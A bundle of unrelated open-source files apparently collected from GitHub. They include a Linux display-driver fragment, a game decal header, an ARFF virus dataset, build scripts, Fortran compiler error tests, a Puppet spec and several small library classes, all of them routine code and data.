REG_WRITE_WITH_AUX(map->cntr, dspcntr, i);
gma_wait_for_vblank(dev);
}
oaktrail_crtc_mode_set_exit:
gma_power_end(dev);
return 0;
}
static int oaktrail_pipe_set_base(struct drm_crtc *crtc,
int x, int y, struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_psb_private *dev_priv = dev->dev_private;
struct gma_crtc *gma_crtc = to_gma_crtc(crtc);
struct drm_framebuffer *fb = crtc->primary->fb;
int pipe = gma_crtc->pipe;
const struct psb_offset *map = &dev_priv->regmap[pipe];
unsigned long start, offset;
u32 dspcntr;
int ret = 0;
/* no fb bound */
if (!fb) {
dev_dbg(dev->dev, "No FB bound\n");
return 0;
}
if (!gma_power_begin(dev, true))
return 0;
start = to_gtt_range(fb->obj[0])->offset;
offset = y * fb->pitches[0] + x * fb->format->cpp[0];
REG_WRITE(map->stride, fb->pitches[0]);
dspcntr = REG_READ(map->cntr);
dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
switch (fb->format->cpp[0] * 8) {
case 8:
dspcntr |= DISPPLANE_8BPP;
break;
case 16:
if (fb->format->depth == 15)
dspcntr |= DISPPLANE_15_16BPP;
else
dspcntr |= DISPPLANE_16BPP;
break;
case 24:
case 32:
dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
break;
default:
dev_err(dev->dev, "Unknown color depth\n");
ret = -EINVAL;
goto pipe_set_base_exit;
}
REG_WRITE(map->cntr, dspcntr);
REG_WRITE(map->base, offset);
REG_READ(map->base);
REG_WRITE(map->surf, start);
REG_READ(map->surf);
pipe_set_base_exit:
gma_power_end(dev);
return ret;
}
const struct drm_crtc_helper_funcs oaktrail_helper_funcs = {
.dpms = oaktrail_crtc_dpms,
.mode_set = oaktrail_crtc_mode_set,
.mode_set_base = oaktrail_pipe_set_base,
.prepare = gma_crtc_prepare,
.commit = gma_crtc_commit,
};
/* Not used yet */
const struct gma_clock_funcs mrst_clock_funcs = {
.clock = mrst_lvds_clock,
.limit = mrst_limit,
.pll_is_valid = gma_pll_is_valid,
};
| {
"pile_set_name": "Github"
} |
/*
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* In addition, as a special exception, the author gives permission to
* link the code of this program with the Half-Life Game Engine ("HL
* Engine") and Modified Game Libraries ("MODs") developed by Valve,
* L.L.C ("Valve"). You must obey the GNU General Public License in all
* respects for all of the code used other than the HL Engine and MODs
* from Valve. If you modify this file, you may extend this exception
* to your version of the file, but you are not obligated to do so. If
* you do not wish to do so, delete this exception statement from your
* version.
*
*/
#pragma once
#define DEFINE_DECAL(name)\
{ name, 0 }
enum decal_e
{
DECAL_GUNSHOT1 = 0,
DECAL_GUNSHOT2,
DECAL_GUNSHOT3,
DECAL_GUNSHOT4,
DECAL_GUNSHOT5,
DECAL_LAMBDA1,
DECAL_LAMBDA2,
DECAL_LAMBDA3,
DECAL_LAMBDA4,
DECAL_LAMBDA5,
DECAL_LAMBDA6,
DECAL_SCORCH1,
DECAL_SCORCH2,
DECAL_BLOOD1,
DECAL_BLOOD2,
DECAL_BLOOD3,
DECAL_BLOOD4,
DECAL_BLOOD5,
DECAL_BLOOD6,
DECAL_YBLOOD1,
DECAL_YBLOOD2,
DECAL_YBLOOD3,
DECAL_YBLOOD4,
DECAL_YBLOOD5,
DECAL_YBLOOD6,
DECAL_GLASSBREAK1,
DECAL_GLASSBREAK2,
DECAL_GLASSBREAK3,
DECAL_BIGSHOT1,
DECAL_BIGSHOT2,
DECAL_BIGSHOT3,
DECAL_BIGSHOT4,
DECAL_BIGSHOT5,
DECAL_SPIT1,
DECAL_SPIT2,
DECAL_BPROOF1, // Bulletproof glass decal
DECAL_GARGSTOMP1, // Gargantua stomp crack
DECAL_SMALLSCORCH1, // Small scorch mark
DECAL_SMALLSCORCH2, // Small scorch mark
DECAL_SMALLSCORCH3, // Small scorch mark
DECAL_MOMMABIRTH, // Big momma birth splatter
DECAL_MOMMASPLAT,
DECAL_END
};
typedef struct
{
char *name;
int index;
} DLL_DECALLIST;
extern DLL_DECALLIST gDecals[DECAL_END];
| {
"pile_set_name": "Github"
} |
define(function() {
/**
* cssToDOM takes a kebab-case string and converts it to camelCase
* e.g. box-sizing -> boxSizing
*
* @access private
* @function cssToDOM
* @param {string} name - String name of kebab-case prop we want to convert
* @returns {string} The camelCase version of the supplied name
*/
function cssToDOM(name) {
return name.replace(/([a-z])-([a-z])/g, function(str, m1, m2) {
return m1 + m2.toUpperCase();
}).replace(/^-/, '');
}
return cssToDOM;
});
| {
"pile_set_name": "Github"
} |
% Datasets for `Pattern Recognition and Neural Networks' by B.D. Ripley
% =====================================================================
%
% Cambridge University Press (1996) ISBN 0-521-46086-7
%
% The background to the datasets is described in section 1.4; this file
% relates the computer-readable files to that description.
%
%
%
% Cushing's syndrome
% ------------------
%
% Data from Aitchison & Dunsmore (1975, Tables 11.1-3).
%
% Data file Cushings.dat has four columns,
%
% Label of the patient
% Tetrhydrocortisone (mg/24hr)
% Pregnanetriol (mg/24hr)
% Type
%
% The type of the last six patients (u1 to u6) should be
% regarded as unknown. (The code `o' indicates `other').
%
%
%
% synthetic two-class problem
% ---------------------------
%
% Data from Ripley (1994a).
%
% This has two real-valued co-ordinates (xs and ys) and a class (xc)
% which is 0 or 1.
%
% Data file synth.tr has 250 rows of the training set
% synth.te has 1000 rows of the test set (not used here)
%
%
%
% viruses
% -------
%
% This is a dataset on 61 viruses with rod-shaped particles affecting
% various crops (tobacco, tomato, cucumber and others) described by
% {Fauquet et al. (1988) and analysed by Eslava-G\'omez (1989). There
% are 18 measurements on each virus, the number of amino acid residues
% per molecule of coat protein.
%
% Data file viruses.dat has 61 rows of 18 counts
% virus3.dat has 38 rows corresponding to the distinct
% Tobamoviruses.
%
% The whole dataset is in order Hordeviruses (3), Tobraviruses (6),
% Tobamoviruses (39) and `furoviruses' (13).
%
%
%
% Leptograpsus crabs
% ------------------
%
% Data from Campbell & Mahon (1974) on the morphology of rock crabs of
% genus Leptograpsus.
%
% There are 50 specimens of each sex of each of two colour forms.
%
% Data file crabs.dat has rows
%
% sp `species', coded B (blue form) or O (orange form)
% sex coded M or F
% index within each group of 50
% FL frontal lip of carapace (mm)
% RW rear width of carapace (mm)
% CL length along the midline of carapace (mm)
% CW maximum width of carapace (mm)
% BD body depth (mm)
%
%
%
% Forensic glass
% --------------
%
% This example comes from forensic testing of glass collected by
% B. German on 214 fragments of glass. It is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% Data file fglass.dat has 214 rows with data for a single glass
% fragment.
%
% RI refractive index
% Na % weight of sodium oxide(s)
% Mg % weight of magnesium oxide(s)
% Al % weight of aluminium oxide(s)
% Si % weight of silicon oxide(s)
% K % weight of potassium oxide(s)
% Ca % weight of calcium oxide(s)
% Ba % weight of barium oxide(s)
% Fe % weight of iron oxide(s)
% type coded 1 to 7
%
% The type codes are:
%
% 1 (WinF) window float glass
% 2 (WinNF) window non-float glass
% 3 (Veh) vehicle glass
% 5 (Con) containers
% 6 (Tabl) tableware
% 7 (Head) vehicle headlamp glass
%
% The ten groups used for the cross-validation experiments (I believe)
% are listed as row numbers in the file fglass.grp,
%
%
%
% Diabetes in Pima Indians
% ------------------------
%
% A population of women who were at least 21 years old, of Pima Indian heritage
% and living near Phoenix, Arizona, was tested for diabetes
% according to World Health Organization criteria. The data
% were collected by the US National Institute of Diabetes and Digestive and
% Kidney Diseases (Smith et al, 1988). This example is also contained in the
% UCI machine-learning database collection (Murphy & Aha, 1995).
%
% The data files have rows containing
%
% npreg number of pregnancies
% glu plasma glucose concentration in an oral glucose tolerance test
% bp diastolic blood pressure (mm Hg)
% skin triceps skin fold thickness (mm)
% ins serum insulin (micro U/ml)
% bmi body mass index (weight in kg/(height in m)^2)
% ped diabetes pedigree function
% age in years
% type No / Yes
%
% Data file pima.tr has 200 rows of complete training data.
% pima.te has 332 rows of complete test data.
% pima.tr2 has the 200 rows of pima.tr plus 100 incomplete rows.
%
%
% Note: there were no column information in the data, hence the names
% were generated automatically
%
%
% Information about the dataset
% CLASSTYPE: nominal
% CLASSINDEX: none specific
%
@relation prnn-viruses
@attribute col_1 INTEGER
@attribute col_2 INTEGER
@attribute col_3 INTEGER
@attribute col_4 INTEGER
@attribute col_5 INTEGER
@attribute col_6 INTEGER
@attribute col_7 INTEGER
@attribute col_8 {0,1,2,3}
@attribute col_9 INTEGER
@attribute col_10 {0,1,2,3,4,7}
@attribute col_11 {3,4,5,6,7,8,9,10,11}
@attribute col_12 {11,12,13,14,15,16,17,18,19,21}
@attribute col_13 {4,5,6,7,8,9,12,15}
@attribute col_14 {4,5,6,7,8,9,10,11,12,14}
@attribute col_15 {0,1,2,3,4,5,6}
@attribute col_16 INTEGER
@attribute col_17 INTEGER
@attribute col_18 {0,1,2,3,4,5}
@data
25,9,9,19,12,8,20,0,10,0,6,21,8,7,4,7,17,5
26,9,9,20,13,8,20,0,10,0,6,21,8,7,4,7,17,5
25,9,9,22,10,10,23,0,13,0,6,19,5,6,4,8,16,5
15,10,21,13,18,12,22,1,9,2,4,11,5,10,1,14,8,2
17,11,22,15,14,10,23,1,11,2,4,11,5,9,1,13,9,1
22,17,17,16,10,15,13,1,7,2,3,14,9,9,2,12,6,2
21,18,18,15,11,15,16,1,7,2,3,14,6,8,2,12,7,2
20,9,16,15,16,6,19,1,7,3,4,14,4,11,1,16,11,3
22,10,17,18,13,6,21,1,8,3,4,13,4,11,1,15,10,3
17,13,14,16,4,9,14,1,13,0,11,13,5,7,1,4,11,5
12,11,9,12,6,5,12,1,9,1,7,12,5,6,0,4,8,2
18,16,16,16,8,6,14,1,14,0,9,12,4,8,0,2,11,3
18,16,15,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
17,13,13,22,8,4,18,1,10,3,8,11,7,6,1,2,10,2
16,13,16,21,9,3,17,1,10,4,7,12,7,5,1,2,11,3
22,19,10,16,10,4,18,1,12,2,8,11,6,8,0,1,8,2
20,10,24,10,6,9,21,0,7,0,7,18,4,9,1,4,8,2
20,21,12,15,9,7,11,1,9,3,8,14,6,7,0,1,10,3
20,21,12,15,9,7,11,1,9,3,9,14,5,7,0,1,10,3
18,11,24,10,9,6,19,0,12,0,7,14,4,11,0,4,9,1
20,12,23,10,8,5,20,0,13,0,6,13,4,11,0,4,10,1
18,19,18,16,8,4,12,0,12,0,10,15,8,6,1,1,12,1
17,16,17,15,8,6,14,1,14,0,9,12,4,8,0,3,11,3
19,17,14,16,8,6,14,1,14,0,8,12,4,8,0,2,12,3
19,17,15,16,8,5,14,1,14,0,8,12,4,8,0,2,12,3
19,15,16,16,8,6,14,1,15,0,8,12,4,8,0,2,12,3
17,17,16,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
18,17,15,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
22,19,10,16,10,4,18,1,12,2,8,11,6,8,0,1,8,2
22,19,10,16,10,5,17,1,12,2,8,11,6,8,0,1,8,2
18,20,10,18,6,8,17,1,14,1,5,16,4,7,0,2,9,2
18,16,16,15,8,6,13,1,14,1,8,12,4,8,1,2,12,3
20,21,12,15,9,7,11,1,10,3,8,14,7,7,0,1,9,3
20,21,12,15,9,7,11,1,10,3,9,14,5,7,0,1,10,3
18,12,23,10,9,5,20,0,14,0,7,12,4,11,0,4,10,1
18,12,21,10,10,5,18,0,13,0,8,12,4,12,0,4,10,1
17,12,22,10,8,5,18,0,14,0,5,13,4,10,0,3,9,1
17,16,16,16,8,6,15,1,14,0,9,12,4,8,0,2,11,3
19,17,15,17,7,6,15,1,14,0,8,12,4,8,0,2,10,3
18,16,16,19,8,6,11,1,15,1,7,13,5,8,0,2,9,3
18,17,15,17,8,6,15,1,14,0,8,12,4,8,0,3,9,3
15,12,14,23,8,3,17,1,9,4,7,15,6,6,1,2,11,2
13,11,14,22,7,3,17,1,10,4,8,13,6,6,1,3,11,2
16,11,15,23,10,4,18,1,10,3,7,12,6,5,1,2,9,3
14,11,14,25,11,3,19,2,10,2,7,12,6,5,1,2,9,3
11,11,15,24,10,5,18,1,11,1,7,14,5,7,2,3,11,2
15,9,12,21,8,4,21,1,10,3,7,15,7,6,1,3,10,3
15,11,15,22,7,3,19,1,8,3,4,14,6,5,1,2,10,2
27,8,13,25,12,26,21,1,20,0,11,18,5,7,5,7,19,3
27,8,13,25,13,27,21,1,19,0,11,18,6,8,5,7,19,3
27,7,12,25,12,26,21,1,20,0,11,17,6,8,5,7,19,3
26,8,13,25,13,26,21,1,19,0,11,18,6,8,5,8,19,3
28,6,13,24,12,30,22,1,18,0,11,18,6,8,4,7,19,3
27,8,14,25,13,26,21,1,18,0,11,18,6,8,5,7,19,3
24,15,18,14,10,14,19,1,14,7,5,19,4,6,2,12,10,4
25,14,15,15,9,12,14,0,8,3,6,12,4,14,1,10,8,0
29,11,12,23,9,15,23,0,16,1,10,13,5,8,3,6,23,5
28,15,22,21,7,32,21,1,13,2,8,16,12,5,5,8,9,1
29,14,22,20,9,20,20,2,15,2,9,16,7,6,6,10,13,2
29,16,18,18,8,32,22,1,14,2,9,18,15,4,4,8,9,1
31,14,21,20,9,21,20,3,15,2,8,17,6,7,6,10,13,1
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:id="@+id/container"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".MainActivity" />
| {
"pile_set_name": "Github"
} |
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .data import DataIngestion
__all__ = ['DataIngestion']
| {
"pile_set_name": "Github"
} |
# Copyright (C) 2006-2020 Istituto Italiano di Tecnologia (IIT)
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD-3-Clause license. See the accompanying LICENSE file for details.
# FIXME All API should use a YARP_manager_API for __declspec(dllimport/dllexport)
# For now always build the library as STATIC
add_library(YARP_manager STATIC)
add_library(YARP::YARP_manager ALIAS YARP_manager)
set(YARP_manager_HDRS yarp/manager/application.h
yarp/manager/arbitrator.h
yarp/manager/binexparser.h
yarp/manager/broker.h
yarp/manager/data.h
yarp/manager/execstate.h
yarp/manager/executable.h
yarp/manager/fsm.h
yarp/manager/graph.h
yarp/manager/kbase.h
yarp/manager/localbroker.h
yarp/manager/logicresource.h
yarp/manager/manager.h
yarp/manager/manifestloader.h
yarp/manager/module.h
yarp/manager/node.h
yarp/manager/physicresource.h
yarp/manager/primresource.h
yarp/manager/resource.h
yarp/manager/scriptbroker.h
yarp/manager/singleapploader.h
yarp/manager/utility.h
yarp/manager/xmlapploader.h
yarp/manager/xmlclusterloader.h
yarp/manager/xmlappsaver.h
yarp/manager/xmlmodloader.h
yarp/manager/xmlresloader.h
yarp/manager/xmltemploader.h
yarp/manager/yarpbroker.h
yarp/manager/yarpdevbroker.h
yarp/manager/ymm-types.h)
set(YARP_manager_IMPL_HDRS yarp/manager/impl/textparser.h)
set(YARP_manager_SRCS yarp/manager/application.cpp
yarp/manager/arbitrator.cpp
yarp/manager/binexparser.cpp
yarp/manager/broker.cpp
yarp/manager/data.cpp
yarp/manager/execstate.cpp
yarp/manager/executable.cpp
yarp/manager/graph.cpp
yarp/manager/kbase.cpp
yarp/manager/localbroker.cpp
yarp/manager/logicresource.cpp
yarp/manager/manager.cpp
yarp/manager/module.cpp
yarp/manager/node.cpp
yarp/manager/physicresource.cpp
yarp/manager/primresource.cpp
yarp/manager/resource.cpp
yarp/manager/scriptbroker.cpp
yarp/manager/singleapploader.cpp
yarp/manager/utility.cpp
yarp/manager/xmlapploader.cpp
yarp/manager/xmlclusterloader.cpp
yarp/manager/xmlappsaver.cpp
yarp/manager/xmlmodloader.cpp
yarp/manager/xmlresloader.cpp
yarp/manager/xmltemploader.cpp
yarp/manager/yarpbroker.cpp)
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Source Files"
FILES ${YARP_manager_SRCS})
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Header Files"
FILES ${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_sources(YARP_manager PRIVATE ${YARP_manager_SRCS}
${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_include_directories(YARP_manager PUBLIC $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}>
$<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)
if(MSVC)
target_include_directories(YARP_manager SYSTEM PRIVATE ${dirent_INCLUDE_DIRS})
endif()
target_compile_features(YARP_manager PUBLIC cxx_std_14)
target_link_libraries(YARP_manager PUBLIC YARP::YARP_os
PRIVATE YARP::YARP_sig)
list(APPEND YARP_manager_PUBLIC_DEPS YARP_os)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_sig)
if(TARGET YARP::YARP_math)
target_link_libraries(YARP_manager PRIVATE YARP::YARP_math)
target_compile_definitions(YARP_manager PRIVATE WITH_YARPMATH)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_math)
endif()
target_include_directories(YARP_manager SYSTEM PRIVATE ${TinyXML_INCLUDE_DIRS})
target_link_libraries(YARP_manager PRIVATE ${TinyXML_LIBRARIES})
list(APPEND YARP_manager_PRIVATE_DEPS TinyXML)
set_property(TARGET YARP_manager PROPERTY PUBLIC_HEADER ${YARP_manager_HDRS})
set_property(TARGET YARP_manager PROPERTY PRIVATE_HEADER ${YARP_manager_IMPL_HDRS})
set_property(TARGET YARP_manager PROPERTY VERSION ${YARP_VERSION_SHORT})
set_property(TARGET YARP_manager PROPERTY SOVERSION ${YARP_SOVERSION})
set_property(TARGET YARP_manager PROPERTY FOLDER "Libraries/Private")
install(TARGETS YARP_manager
EXPORT YARP_manager
RUNTIME
DESTINATION "${CMAKE_INSTALL_BINDIR}"
COMPONENT YARP_manager
LIBRARY
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager
NAMELINK_COMPONENT YARP_manager-dev
ARCHIVE
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager-dev
PUBLIC_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager"
COMPONENT YARP_manager-dev
PRIVATE_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager/impl"
COMPONENT YARP_manager-priv-dev)
set(YARP_manager_PUBLIC_DEPS ${YARP_manager_PUBLIC_DEPS} PARENT_SCOPE)
set(YARP_manager_PRIVATE_DEPS ${YARP_manager_PRIVATE_DEPS} PARENT_SCOPE)
| {
"pile_set_name": "Github"
} |
using System;
using Waher.Security;
namespace Waher.Networking.CoAP.Options
{
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public abstract class CoapOptionOpaque : CoapOption
{
private byte[] value;
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public CoapOptionOpaque()
: base()
{
}
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
/// <param name="Value">Opaque option value.</param>
public CoapOptionOpaque(byte[] Value)
{
this.value = Value;
}
/// <summary>
/// Gets the option value.
/// </summary>
/// <returns>Binary value. Can be null, if option does not have a value.</returns>
public override byte[] GetValue()
{
return this.value;
}
/// <summary>
/// <see cref="object.ToString()"/>
/// </summary>
public override string ToString()
{
return base.ToString() + " = " + Hashes.BinaryToString(this.value);
}
}
}
| {
"pile_set_name": "Github"
} |
! RUN: %S/test_errors.sh %s %t %f18
! Extended derived types
module m1
type :: t1
integer :: x
!ERROR: Component 'x' is already declared in this derived type
real :: x
end type
end
module m2
type :: t1
integer :: i
end type
type, extends(t1) :: t2
!ERROR: Component 'i' is already declared in a parent of this derived type
integer :: i
end type
end
module m3
type :: t1
end type
type, extends(t1) :: t2
integer :: i
!ERROR: 't1' is a parent type of this type and so cannot be a component
real :: t1
end type
type :: t3
end type
type, extends(t3) :: t4
end type
type, extends(t4) :: t5
!ERROR: 't3' is a parent type of this type and so cannot be a component
real :: t3
end type
end
module m4
type :: t1
integer :: t1
end type
!ERROR: Type cannot be extended as it has a component named 't1'
type, extends(t1) :: t2
end type
end
module m5
type :: t1
integer :: t2
end type
type, extends(t1) :: t2
end type
!ERROR: Type cannot be extended as it has a component named 't2'
type, extends(t2) :: t3
end type
end
module m6
! t1 can be extended if it is known as anything but t3
type :: t1
integer :: t3
end type
type, extends(t1) :: t2
end type
end
subroutine s6
use :: m6, only: t3 => t1
!ERROR: Type cannot be extended as it has a component named 't3'
type, extends(t3) :: t4
end type
end
subroutine r6
use :: m6, only: t5 => t1
type, extends(t5) :: t6
end type
end
module m7
type, private :: t1
integer :: i1
end type
type, extends(t1) :: t2
integer :: i2
integer, private :: i3
end type
end
subroutine s7
use m7
type(t2) :: x
integer :: j
j = x%i2
!ERROR: PRIVATE component 'i3' is only accessible within module 'm7'
j = x%i3
!ERROR: PRIVATE component 't1' is only accessible within module 'm7'
j = x%t1%i1
end
! 7.5.4.8(2)
module m8
type :: t
integer :: i1
integer, private :: i2
end type
type(t) :: y
integer :: a(1)
contains
subroutine s0
type(t) :: x
x = t(i1=2, i2=5) !OK
end
subroutine s1
a = [y%i2] !OK
end subroutine
end
subroutine s8
use m8
type(t) :: x
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(2, 5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(i1=2, i2=5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
a = [y%i2]
end
! 7.5.4.8(2)
module m9
interface
module subroutine s()
end subroutine
end interface
type :: t
integer :: i1
integer, private :: i2
end type
end
submodule(m9) sm8
contains
module subroutine s
type(t) :: x
x = t(i1=2, i2=5) !OK
end
end
| {
"pile_set_name": "Github"
} |
require 'puppet'
require 'tempfile'
describe Puppet::Type.type(:file_line) do
let :file_line do
Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'line', :path => '/tmp/path')
end
it 'should accept a line and path' do
file_line[:line] = 'my_line'
file_line[:line].should == 'my_line'
file_line[:path] = '/my/path'
file_line[:path].should == '/my/path'
end
it 'should accept a match regex' do
file_line[:match] = '^foo.*$'
file_line[:match].should == '^foo.*$'
end
it 'should not accept a match regex that does not match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^bar=blah$'
)}.to raise_error(Puppet::Error, /the value must be a regex that matches/)
end
it 'should accept a match regex that does match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^\s*foo=.*$'
)}.not_to raise_error
end
it 'should accept posix filenames' do
file_line[:path] = '/tmp/path'
file_line[:path].should == '/tmp/path'
end
it 'should not accept unqualified path' do
expect { file_line[:path] = 'file' }.should raise_error(Puppet::Error, /File paths must be fully qualified/)
end
it 'should require that a line is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :path => '/tmp/file') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should require that a file is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'path') }.should raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should default to ensure => present' do
file_line[:ensure].should eq :present
end
it "should autorequire the file it manages" do
catalog = Puppet::Resource::Catalog.new
file = Puppet::Type.type(:file).new(:name => "/tmp/path")
catalog.add_resource file
catalog.add_resource file_line
relationship = file_line.autorequire.find do |rel|
(rel.source.to_s == "File[/tmp/path]") and (rel.target.to_s == file_line.to_s)
end
relationship.should be_a Puppet::Relationship
end
it "should not autorequire the file it manages if it is not managed" do
catalog = Puppet::Resource::Catalog.new
catalog.add_resource file_line
file_line.autorequire.should be_empty
end
end
| {
"pile_set_name": "Github"
} |
import { createElement as h } from 'react'
import { AppRegistry } from 'react-native'
import { BrowserRouter } from 'react-router-dom'
import { APP_ID, DATA_KEY } from '@roguejs/app/constants'
import App from './App'
AppRegistry.registerComponent('App', () => {
return props => h(BrowserRouter, {}, h(App, props))
})
AppRegistry.runApplication('App', {
initialProps: typeof window !== undefined ? window[DATA_KEY] : {},
rootTag: document.getElementById(APP_ID),
})
// https://github.com/alidcastano/rogue.js/issues/78
// import hydrate from'@roguejs/app/client.native'
// import App from './App'
// hydrate(App)
if (module.hot) {
module.hot.accept()
} | {
"pile_set_name": "Github"
} |
org.apache.commons.math3.distribution.HypergeometricDistribution
| {
"pile_set_name": "Github"
} |
<?php
class HTMLPurifier_AttrDef_TextTest extends HTMLPurifier_AttrDefHarness
{
public function test()
{
$this->def = new HTMLPurifier_AttrDef_Text();
$this->assertDef('This is spiffy text!');
$this->assertDef(" Casual\tCDATA parse\ncheck. ", 'Casual CDATA parse check.');
}
}
// vim: et sw=4 sts=4
| {
"pile_set_name": "Github"
} |
//
// UIControl+ActionBlocks.m
// iOS-Categories (https://github.com/shaojiankui/iOS-Categories)
//
// Created by Jakey on 15/5/23.
// Copyright (c) 2015年 www.skyfox.org. All rights reserved.
//
#import "UIControl+ActionBlocks.h"
#import <objc/runtime.h>
static const void *UIControlActionBlockArray = &UIControlActionBlockArray;
@implementation UIControlActionBlockWrapper
- (void)invokeBlock:(id)sender {
if (self.actionBlock) {
self.actionBlock(sender);
}
}
@end
@implementation UIControl (ActionBlocks)
-(void)handleControlEvents:(UIControlEvents)controlEvents withBlock:(UIControlActionBlock)actionBlock {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
UIControlActionBlockWrapper *blockActionWrapper = [[UIControlActionBlockWrapper alloc] init];
blockActionWrapper.actionBlock = actionBlock;
blockActionWrapper.controlEvents = controlEvents;
[actionBlocksArray addObject:blockActionWrapper];
[self addTarget:blockActionWrapper action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
- (void)removeActionBlocksForControlEvents:(UIControlEvents)controlEvents {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
NSMutableArray *wrappersToRemove = [NSMutableArray arrayWithCapacity:[actionBlocksArray count]];
[actionBlocksArray enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
UIControlActionBlockWrapper *wrapperTmp = obj;
if (wrapperTmp.controlEvents == controlEvents) {
[wrappersToRemove addObject:wrapperTmp];
[self removeTarget:wrapperTmp action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
}];
[actionBlocksArray removeObjectsInArray:wrappersToRemove];
}
- (NSMutableArray *)actionBlocksArray {
NSMutableArray *actionBlocksArray = objc_getAssociatedObject(self, UIControlActionBlockArray);
if (!actionBlocksArray) {
actionBlocksArray = [NSMutableArray array];
objc_setAssociatedObject(self, UIControlActionBlockArray, actionBlocksArray, OBJC_ASSOCIATION_RETAIN);
}
return actionBlocksArray;
}
@end
| {
"pile_set_name": "Github"
} |
/*
* <<
* Davinci
* ==
* Copyright (C) 2016 - 2019 EDP
* ==
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* >>
*
*/
package edp.davinci.service;
import edp.core.exception.NotFoundException;
import edp.core.exception.ServerException;
import edp.core.exception.UnAuthorizedExecption;
import edp.davinci.core.service.CheckEntityService;
import edp.davinci.dto.displayDto.*;
import edp.davinci.dto.roleDto.VizVisibility;
import edp.davinci.model.DisplaySlide;
import edp.davinci.model.MemDisplaySlideWidget;
import edp.davinci.model.Role;
import edp.davinci.model.User;
import org.springframework.web.multipart.MultipartFile;
import java.util.List;
public interface DisplaySlideService extends CheckEntityService {
DisplayWithSlides getDisplaySlideList(Long displayId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
SlideWithMem getDisplaySlideMem(Long displayId, Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
DisplaySlide createDisplaySlide(DisplaySlideCreate displaySlideCreate, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateDisplaySildes(Long displayId, DisplaySlide[] displaySlides, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlide(Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<MemDisplaySlideWidget> addMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetCreate[] slideWidgetCreates, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidget(MemDisplaySlideWidget memDisplaySlideWidget, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteMemDisplaySlideWidget(Long relationId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlideWidgetList(Long displayId, Long slideId, Long[] memIds, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetDto[] memDisplaySlideWidgets, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideBGImage(Long slideId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
